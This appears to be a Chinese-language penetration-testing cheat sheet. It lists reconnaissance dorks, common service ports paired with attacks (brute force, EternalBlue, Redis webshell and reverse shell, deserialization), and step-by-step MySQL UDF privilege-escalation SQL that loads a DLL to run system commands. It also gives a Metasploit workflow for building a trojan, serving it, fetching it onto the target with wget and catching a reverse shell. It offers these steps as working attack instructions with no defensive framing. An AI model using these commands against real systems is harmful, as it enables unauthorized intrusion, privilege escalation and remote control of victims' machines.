信息收集
site:edu.cn intext:后台管理 //限定后缀查找内容
inurl:github.com xx //限定网页查找
fofa
shodan
21 FTP 匿名访问爆破
22 ssh 爆破九头蛇 msf 工具...
445 永恒之蓝 ms17-01 0
1433 sql server 爆破 xp_ cmdshell提权
3306 mysq|爆破 root 提权 udf提权
6379 redis 未授权访问 写公钥 写webshell 定时任务 反弹shell 主从复制RCE
7001/7002 weblogic java的反序列化 弱口令
8080/8089 jboss Jenkins java反序列化弱口令
27017/27018 MongoDB 爆破 未授权
888/8888宝塔
dirsearch 扫描 //比较多自定义,当全部返回200时候可以利用字节大小去除
拿站
bp
sqllmap
csrf
文件上传
rce
ssrf
蚁剑
插件提权
mysql udf提权 //需要通过数据库连接,用户必须权限足够
select version(); #查看版本 如果版本号大于5.1.4 上传udf的位置应该放在mysql\lib\plugin【如果不存在目录 自己新建一个】 如果版本小于5.1 上传udf的位置应该放在c盘的windows或者windows32目录里 show variables like "%plugin%" #查看plugin位置 show variables like "%secure%" #查看secure_file_priv,NULL才可以提权 show variables like "%compile%"; #查看数据库是多少位的 cd /usr/share/metasploit-framework/data/exploit/mysql //kali下载udf 文件末为.so,则为linux系统,如果是win,则后缀为dll ls -la python -m http.server //kali开服务器下载udf create function cmdshell returns string soname 'myudf.dll'; //cmdshell是自定义函数,可以更换 select cmdshell('whoami');
#只能连接数据库的提权 create table udfeval(shellcode longblob); #创建表 insert into udfeval values(load_file('F:/udf.dll')); #在表里插入信息 select shellcode from udfeval into dumpfile 'C:\\windows\udf.dll'; #将表里面的信息导出 create function cmdshell returns string soname 'F:/phpstudy/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll'; select * from func; select cmdshell('whoami');
linux提权
find / -perm -u=s -type f 2>/dev/null //寻找提权命令
GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool msf运行.sh
cs
msf
-
msf生成elf/exe马
-
python -m httpserver 服务器开启下载
-
wegt ip/shell 目标主机连接下载
-
chmod -x shell 给权限后运行
-
use exploit/muti/handler 配置msf监听上线,反弹